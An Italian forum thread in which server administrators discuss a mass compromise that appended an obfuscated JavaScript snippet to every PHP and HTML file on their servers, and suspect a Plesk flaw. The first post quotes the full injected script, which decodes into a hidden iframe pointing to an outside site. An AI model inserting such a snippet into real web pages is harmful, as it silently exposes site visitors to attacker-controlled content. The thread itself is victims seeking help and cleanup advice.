Attacco a siti web

[menozero]

Salve,
da ieri sera tutte le pagine php e html di tutti i miei siti presenti sullo stesso server (sono una ventina in tutto) presentano uno script nella ultima riga.

Quello che mi chiedo è:
1) Qualcuno sa che falla ha potuto sfruttare?
2) C'e' un modo per non cancellare a mano quella riga in tutte le pagine?
3) Che cosa fa queso script? E' evidente che è criptato, come si decritta?

Ecco lo script:

<script>function stcount() {var t,o,l,i,j;var s='06004711610112011609711610109706206004711610112 01160971141010970620601051021140971091010321151140 99061039104116116112058047047115104105110121045115 11609711604609911110903903211910510011610406103904 90390321041011051031041160610390490390321151161211 08101061039118105115105098105108105116121058032104 10510010010111005903906206004710510211409710910106 2';t='';l=s.length;i=0;while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(Str ing.fromCharCode(t));t='';}}stcount();</script>

[MacApp]

Server? Sistema operativo? Versione PHP? Eventuale CMS? Database?

[menozero]

LINUX
PHP 4.3.9
Apache/2.0.52 (CentOS)
Database Mysql

L'unico cms installato su un sito è wordpress, poi tutti gli altri script installati sul server sono miei e controllati al 100%.

[deleted_110]

quello che fa quello script e' di creare un iframe che punta a

http://shiny-stat.com

sito tra l'altro non raggiungibile

come sia finito nei tuoi siti e cosa serva quell'iframe non te lo so dire ma credo che da una ricerca su google dovresti trovare info

[zerozenit]

Anche a noi ieri pomeriggio hanno colpito tutti i domini presenti sul server. Alla fine di ogni file .php e .html è stata scritta la stringa già indicata nei post precedenti.

Questa la nostra configurazione:
Linux CentOS
PHP 4.3.9
Apache/2.0.52 (CentOS)
MySQL - 4.1.20
phpMyAdmin - 2.8.2.4
Plesk 8.3

Sui vari domini ci sono sia domini con PHP completamente custom, che Wordpress e Drupal (ma quest'ultimo offline in fase di sviluppo).

[deleted_110]

fatemi capire una cosa:

ma la stringa ve la trovate semplicemente dentro la pagina generata o proprio dentro il file HTML o PHP?

Nel primo caso si puo' pensare a un attacco tramite XSS

ma nel secondo sembrerebbe che abbiano trovato il modo di penetrare dentro le cartelle dei vostri server, nel qual caso la falla mi pare seria.

[zerozenit]

Non è stato generato alcun nuovo file. Tutta quella stringa è stata aggiunta dopo l'ultimo carattere di ogni file .php e .html presente in ognuno dei domini sulla macchina (io ne ho 92...).

Se ne parla anche qui:
http://forum.joomla.it/index.php?top...2509;topicseen

Secondo me è un buco di Plesk 8.3, vorrei sapere da menozero se anche lui ha Plesk istallato su CentOS.

[menozero]

Ciao,
si ho plesk,lamia versione è la seguente:
psa v8.0.1_build80060713.16 os_CentOS 4.2

La stringa è inserita indistintamente su tutti i file php e html presenti sul server (sono almeno mille files). E' stata inserita alla fine del testo.

[zerozenit]

Allora darei quasi per certo che la falla è in Plesk. Magari avessi solo mille file... comunque, dopo aver bonificato qualche dominio in emergenza attraverso ripristini o interventi manuali, stiamo provando a predisporre uno script in batch che ripulisca tutta la dir dei domini /var/www/vhosts

Ora provo a cercare se c'è qualche forum su Plesk per vedere se dicono qualcosa.

[menozero]

Anch'io ho ripulito il possibile a mano, altri domini li ho temporanenamente disabilitati.
Se non c'e' un altro sistema io opterei per scaricare tutti i files tramite ftp e poi usare Search and Replace per cancellare la stringa e poi ri-uploadare tutto via ftp.

Il problema poi è anche capire come e da dove sono entrati.